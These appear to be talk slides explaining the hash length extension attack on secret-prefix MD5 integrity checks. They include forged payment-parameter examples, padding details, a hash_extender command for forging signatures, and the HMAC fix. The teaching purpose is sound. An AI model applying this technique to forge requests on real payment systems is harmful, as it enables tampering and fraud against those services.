My attempt to explain a fun attack I recently learned about - no claim to anything new here!
Video of presentation at https://www.youtube.com/watch?v=3R_q5XD-RJU.
Thanks go to Soroush @irsdl.
2. Introduction
• An application uses this scheme as an integrity check:
hash($secret + $message)
// where + denotes concatenation
• Whenever the message is potentially subject to interference, the hash is sent
alongside
• The theory goes that any message tampering will be detected
• But this is potentially vulnerable to a “hash length extension attack”
• Secret prefix
• Attacker knows message and hash
• Vulnerable algorithm, e.g. MD5, SHA-1, SHA-256, SHA-512 (not SHA-384)
• Thanks to Soroush Dalili @irsdl
3. What makes a hash vulnerable?
• The hash algorithm chews on the input
• At the end, the internal state of the hash algorithm is the hash it spits out
• We can set the internal state of the hash algorithm to start from this point
• We can then feed in more input
• We now have a hash for a longer message that starts with the original input
• It doesn’t matter if the input began with a secret, we don’t need to know it
4. Exploitation
• Sounds great, doesn’t it?
POST /transfer HTTP/1.1
account_from=10203040&account_to=90807060&amount=100&hash=AABBCC112233
// where hash = MD5("SECERET1020304090807060100")
• So we set our MD5 state to AABBCC112233, feed in a 0 and get a new hash
• This will “validate”:
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
// where hash = MD5("SECERET10203040908070601000")
• Unfortunately it’s not that simple
5. Deep dive
• MD5 is a block-based algorithm
• Padding is used to prepare the input before it’s digested
• Different algorithms use different schemes
• Take a message M
• The input that MD5 works on is:
M + PADDING + LENGTH_OF_M
• This will be some whole number of blocks in length
• What does that mean for our attack?
6. What’s really going on
account_from=10203040&account_to=90807060&amount=1000&hash=DDEEFF445566
• We’d like hash = MD5("SECERET10203040908070601000")
• When we run our hash length extension attack, the input to the hash is really:
"SECERET1020304090807060100" + PADDING + LENGTH + "0" + PADDING + LENGTH
• The “message” we have a valid hash for is:
"SECERET1020304090807060100" + PADDING + LENGTH + "0"
• The app is checking hash($secret + $account_from + $account_to + $amount)
• We need to preserve account_from=10203040&account_to=90807060
• So that leaves amount="100" + PADDING + LENGTH + "0"
• The first PADDING + LENGTH was originally “metadata”: it’s now part of the data
• The crafted input isn’t tolerated in context
7. Demo
• That’s not to say it can never work
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd74
0683e182f0
// where hash = MD5($secret + $seller_id + $reference + $amount)
= MD5($secret + "1234widget145.20")
= MD5($secret + "1234widget145.20" + PADDING + LENGTH)
• So what about
seller_id=1234&reference=widget145.20PADDINGLENGTH&amount=0.99&hash=398e6
d69a7fdf27744bd55cfdfc9fdb4
= MD5($secret + "1234widget145.20" + PADDING + LENGTH + "0.99")
• This will work if the app accepts the weird reference value
• https://github.com/iagox86/hash_extender
./hash_extender --data 1234widget145.20 --secret-min 8 --secret-max 12 --
append 0.99 --signature 75b145717ad82cfefdcd740683e182f0 --format md5
8. Final Thoughts
• Not always exploitable – but when it is, impact can be high
• Tricky to find in a pure black box test
• If the hash scheme used a delimiter, the attack would still work
• Just makes it harder to find – need to know delimiter as well
• But it would stop a simpler attack:
seller_id=1234&reference=widget&amount=145.20&hash=75b145717ad82cfefdcd
740683e182f0
seller_id=1234&reference=widget1&amount=45.20&hash=75b145717ad82cfefdcd
740683e182f0
• Secret suffix is vulnerable due to collisions
• https://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
• We’ve already solved the MAC problem
• “Length Extension Attacks” Burp App – not tested
For MD5:
PADDING is 0x80 plus null bytes
LENGTH is bits in a little-endian 8 byte-field
PADDING and LENGTH not necessarily printable bytes and make no sense in context of app
Output of hash_extender is ASCII hex of $data + PADDING + LENGTH + $append
PADDING starts 0x800000…
LENGTH is length($secret + $data) in bits (“SUPERSECRET1234widget145.20” = 27 bytes = 216 bits = 0xD8)
Need “data” parameter so it knows how much PADDING and LENGTH to tack on (technically could just be a number but output includes that data)
Output differs with length of secret as longer secret -> shorter padding and shorter length, but “new signature” i.e. new hash same as we’re winding on the hash from the same start point (the given hash) with the same data appended